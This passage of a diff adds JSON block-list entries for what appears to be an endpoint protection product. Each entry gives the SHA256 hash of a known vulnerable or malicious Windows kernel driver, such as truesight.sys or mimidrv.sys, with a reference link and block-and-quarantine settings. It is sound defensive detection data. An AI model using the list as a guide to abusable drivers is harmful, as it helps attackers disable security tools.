+ "type": "hash",
+ "value": "f06489a6a790e5b2165fee14c6b35c31f6450f102a8bf14db59bdae51f38f8d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40974e93-174e-52a2-9028-ec3f4387fd57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466100Z",
+ "creation_date": "2026-03-23T11:45:30.466103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f58e09651d48d2b1bcec7b9f7bb85a2d1a7b65f7a51db281fe0c4f058a48597",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "409fe022-4e7c-534c-b559-a818a1df5a54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835025Z",
+ "creation_date": "2026-03-23T11:45:30.835029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3fc6e204a8983d7c9a967c3919d41b0b04745c38086ea94fc80f60d8b4520db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40a13e3b-770c-5f3f-bbe5-4ca59cf152c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981241Z",
+ "creation_date": "2026-03-23T11:45:29.981244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2ed6c1906663016123559d9f3407bc67f64e0d235fa6f10810a3fa7bb322967",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b7d1e4-aa34-5bac-a41d-ecfd7318574f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977604Z",
+ "creation_date": "2026-03-23T11:45:29.977606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a52a6fe55bd1c294d6f26b68839770d97850e9ccd5ecfd7f96b9dc4386e0ff08",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b99a0a-943e-5e3a-a20b-3c9729a77b47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615152Z",
+ "creation_date": "2026-03-23T11:45:29.615154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d33f19a12cd8e8649a56ce2a41e2b56d2ed80f203e5ededc4114c78ef773ffa8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b9c474-0a2f-5e85-a3ff-027294c7ac97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825211Z",
+ "creation_date": "2026-03-23T11:45:30.825214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82f20f52a3e0951ecd4684068ad79d0c0f0efb6810633cee7b195feff842c997",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40c2ced3-6593-52ff-b103-7ff0d083fa52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825237Z",
+ "creation_date": "2026-03-23T11:45:30.825240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07d4944c3487b593ae998a8e63fb5d126e65c070bf496618174100b4bc560c3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40ca5533-3d89-5817-98be-ab9c6f613de8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485515Z",
+ "creation_date": "2026-03-23T11:45:31.485519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69081c612cd0536f5c5396c1b570c3b5ae63aa2053d83c3c381437899018c8ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40ca7117-6213-5a9a-8ce4-d165080ab765",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617896Z",
+ "creation_date": "2026-03-23T11:45:29.617898Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "159dcf37dc723d6db2bad46ed6a1b0e31d72390ec298a5413c7be318aef4a241",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40da7d9a-89d3-54b6-b4a3-c07954902ed1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613888Z",
+ "creation_date": "2026-03-23T11:45:29.613890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "543c3f024e4affd0aafa3a229fa19dbe7a70972bb18ed6347d3492dd174edac5",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40e7da86-a488-59a9-a674-b15cac9c3914",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616294Z",
+ "creation_date": "2026-03-23T11:45:29.616296Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40ef771e-b860-5576-bbd0-6397a9fa6ba8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472611Z",
+ "creation_date": "2026-03-23T11:45:31.472614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62d9564c56479d3c20474f2a0a563d9fd674d8546de2c9b92d54a6c6d909aae2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40f0aa3e-e04b-5113-9a12-42e323c248f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821612Z",
+ "creation_date": "2026-03-23T11:45:30.821615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dda2a604bb94a274e23f0005f0aa330d45ca1ea25111746fb46fa5ef6d155b1d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40f26117-0b2a-5270-89ba-8987b7df09b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480401Z",
+ "creation_date": "2026-03-23T11:45:30.480407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b465faf013929edf2f605c8cd1ac7a278ddc9a536c4c34096965e6852cbfb51",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40fa6648-8ac5-5c00-94ae-bd7aa0cb522f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484656Z",
+ "creation_date": "2026-03-23T11:45:31.484659Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484669Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0c18166aadea1991c0ce4c7c5005c69d46cb9f641632e2fcc76ca4904ce1097",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40fc0a8c-7d0e-5130-a1b5-18b1c7919e99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813630Z",
+ "creation_date": "2026-03-23T11:45:31.813632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "142889356b39784bbeb55dd363909856502fb3e5f6fb506c46eb6ecbe4de3269",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4101429b-28fa-5714-b24e-ffe18be8aad8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464246Z",
+ "creation_date": "2026-03-23T11:45:30.464249Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41070809-348d-5f77-873a-25533d9b99d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471348Z",
+ "creation_date": "2026-03-23T11:45:30.471352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1d0fdfddddfe520afc18b79b18b5eef730f7586639bd05857a41c0d09a9b9e6",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41184a19-2d2e-5be1-a61f-ce9d5417a2b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831236Z",
+ "creation_date": "2026-03-23T11:45:30.831238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb0e276462962a84013194cd6f17cd604ac7775ffeea4ef4af3b2a510fc3a116",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "411b3cfd-b389-50de-8042-4a714c66310c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605989Z",
+ "creation_date": "2026-03-23T11:45:29.605991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f29073dc99cb52fa890aae80037b48a172138f112474a1aecddae21179c93478",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41292acc-d9b3-5747-9f86-f3709c2082a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493329Z",
+ "creation_date": "2026-03-23T11:45:31.493331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be322d0beee8d45e0408de69ef9a27dddbefddf20f598716287bb16d3e4db549",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4130a484-9097-5047-8497-3842db87ca41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813612Z",
+ "creation_date": "2026-03-23T11:45:31.813614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e92d6b974a50604b907b3f882a49cc75f0e54a027232d813aab13251257cb67",
